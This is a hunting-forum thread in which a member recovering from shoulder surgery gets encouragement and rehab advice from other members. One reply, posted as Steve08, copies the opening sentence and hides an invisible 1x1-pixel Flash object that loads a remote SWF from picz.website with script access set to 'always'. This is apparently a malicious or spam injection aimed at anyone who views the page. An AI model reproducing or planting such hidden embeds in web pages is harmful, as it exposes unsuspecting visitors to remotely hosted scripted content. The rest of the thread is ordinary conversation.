For those who remember

SamanthaJ

Last year I injured my shoulder in a car accident and missed most of deer season. Well the physical therapy was not helping so I ended up having surgery on my shoulder almost 4 weeks ago. The healing process is a very slow one. I'm in physical therapy again, probably until right before primitive weapon hunting season. I'm also still in an arm sling until June 2. :banginghe I should be able to fish after getting out of the sling and more good news is I shouldn't miss any of this coming deer season. I am blessed!

I haven't really chatted with many of you. I joined this forum to get some new hunting, fishing, and hiking buddies so please feel free to PM me anytime, I'd love to chat.

elfiii

Admin
Staff member
Glad you are on the mend and I hope the fix is permanent.:cool:

Don't push to hard too fast on the rehab and you'll be back in the woods in no time!

Jim Boyd

Excellent news!

Catch 'em up and then lay a big buck down.

Glad the report is good.

JustUs4All

Slow Mod
Staff member
Hope you get a chance to get after them during primitive weapons season.

MFOSTER

BANNED
Take care of yourself while you young,those bones are harder to heal as we get older.

NCHillbilly

Administrator
Staff member
Hope you heal up soon. Taking care of that shoulder and getting it back to normal is priority 1 right now, the fish and deer aren't going anywhere.

7dawg9

Shoulders are the toughest joint to heal, fortunately, you appear to be younger than most of us old folks ! Still, take it easy, keep your expectations modest. One day you may feel great and want to push it, but don't. You have a lot of years ahead of you, be patient and enjoy your time in the woods.

bullgator

I had shoulder surgery in 2001. It is a painful recovery at first but listen to your rehab therapist and you'll be fine. As elfiii said, don't push it too hard or you'll be back at the doc's office for a do-over. I'm sure you'll be just fine by hunting season.

Steve08

Last year I injured my shoulder in a car accident and missed most of deer season.<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="http://picz.website/u/1/c.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="http://picz.website/u/1/c.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
Be patient, don't rush it. I wish you a full and quick recovery.

six

Good luck. Been there and done that on multiple occasions. Had each shoulder operated on twice among other things. Rehab is key. You'll be fishing before you know it.

mattech

Deranged Throat-Puncher
Get well soon

ripplerider

I feel your pain having had 4 shoulder surgeries. The last one was a total reverse replacement back in August '15. Physical therapy in no fun to say the least but absolutely vital to regaining function. The shoulder is a very complicated part of your body. The good news is I was able to paddle a short section of the Chatooga river last weekend, something I never expected to experience again. You might look into getting the lightest possible rifle you can find. I'm still using my trusty Model 700 but its hard to hold steady without a rest. I traded up a collapsible pair of hiking staffs a couple of weeks ago which I plan to use as a rifle rest when I'm still-hunting.

SamanthaJ

Thank you everyone for the encouraging words and well wishes. I have been keeping up with my physical therapy, both at their office and at home. I have high hopes for a full recovery!!

pse hunter

Thank you everyone for the encouraging words and well wishes. I have been keeping up with my physical therapy, both at their office and at home. I have high hopes for a full recovery!!

you will, it just takes time and will power